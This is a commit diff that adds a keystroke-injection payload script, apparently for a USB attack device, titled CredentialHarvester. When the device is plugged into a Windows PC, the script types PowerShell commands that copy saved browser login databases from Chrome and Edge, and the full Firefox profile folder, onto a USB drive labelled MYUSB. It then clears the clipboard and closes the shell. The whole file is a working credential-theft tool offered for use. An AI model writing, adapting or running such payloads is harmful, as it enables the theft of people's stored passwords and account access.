Create CredentialHarvester.txt

2024-05-28 23:34:46 -04:00 · 2024-05-28 23:34:46 -04:00 · ddd7d2af4b
parent 45ab8a2a48
commit ddd7d2af4b
1 changed files with 58 additions and 0 deletions
--- a/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt
+++ b/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt
@ -0,0 +1,58 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                              Title: CredentialHarvester                              %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                             Author: github.com/markcyber                             %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                   Description: This script exfiltrates credentials                   %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                   Target: Firefox, Chrome, Edge on Windows Machines                  %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%                                  Category: Exfiltration                              %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%      This script requires a secondary USB named "MYUSB" to save credentials to       %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM Open PowerShell with elevated privileges
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 1000
+REM Check if the USB drive exists
+STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
+STRING if ($usbDrive -ne $null) {
+ENTER
+DELAY 500
+STRING cd $usbDrive;
+ENTER
+DELAY 500
+STRING mkdir BrowserData;
+ENTER
+DELAY 500
+STRING cd BrowserData;
+ENTER
+DELAY 500
+REM Copy Chrome Login Data to USB
+STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
+STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
+ENTER
+DELAY 500
+REM Copy Firefox Login Data to USB
+STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
+STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
+ENTER
+DELAY 500
+REM Copy Edge Login Data to USB
+STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
+STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 500
+REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
+STRING echo off | clip
+ENTER
+DELAY 500
+REM Close PowerShell
+STRING exit
+ENTER
+DELAY 500